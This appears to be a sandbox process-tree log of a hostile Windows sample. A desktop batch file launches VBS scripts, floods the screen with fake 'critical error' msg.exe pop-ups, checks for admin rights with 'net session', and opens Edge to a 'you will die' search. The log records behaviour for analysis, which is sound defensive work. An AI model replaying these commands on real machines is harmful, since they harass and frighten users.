C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14592

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21924

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:1228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21432

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22184

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22368

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21440

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8980

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:20624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21736

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21732

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23292

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21900

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:1896

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:2496

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23372

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9272

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8548

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21796

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21816

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22016

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8928

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8636

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8684

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7924

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7960

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22196

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:4668

C:\Windows\system32\net.exe
net session
2⤵
PID:3252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Desktop\vwiwus.bat"
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:4628

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:1016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x128,0x12c,0xfc,0x130,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:3608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
4⤵
PID:4536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
4⤵
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
4⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
4⤵
PID:1200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
4⤵
PID:5012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
4⤵
PID:2068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
4⤵
PID:1908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
4⤵
PID:5164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
4⤵
PID:5376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
4⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
4⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
4⤵
PID:5308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
4⤵
PID:6112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
4⤵
PID:6236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
4⤵
PID:6380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
4⤵
PID:6660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
4⤵
PID:6796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
4⤵
PID:6996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
4⤵
PID:6160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
4⤵
PID:6896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
4⤵
PID:7264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
4⤵
PID:7656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
4⤵
PID:7768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7536 /prefetch:1
4⤵
PID:7784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1
4⤵
PID:7824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1
4⤵
PID:8092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
4⤵
PID:8104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:1
4⤵
PID:8116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8400 /prefetch:1
4⤵
PID:8124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:1
4⤵
PID:220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8508 /prefetch:1
4⤵
PID:3868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:1
4⤵
PID:1112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9300 /prefetch:1
4⤵
PID:7640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9288 /prefetch:1
4⤵
PID:7776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9304 /prefetch:1
4⤵
PID:7704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9272 /prefetch:1
4⤵
PID:8196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9560 /prefetch:1
4⤵
PID:8204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9812 /prefetch:1
4⤵
PID:8212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9932 /prefetch:1
4⤵
PID:8220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10172 /prefetch:1
4⤵
PID:8228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10308 /prefetch:1
4⤵
PID:8236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10428 /prefetch:1
4⤵
PID:8244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10548 /prefetch:1
4⤵
PID:8252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
4⤵
PID:9188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
4⤵
PID:9232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
4⤵
PID:9444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10996 /prefetch:1
4⤵
PID:9584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
4⤵
PID:9708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11316 /prefetch:1
4⤵
PID:9736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
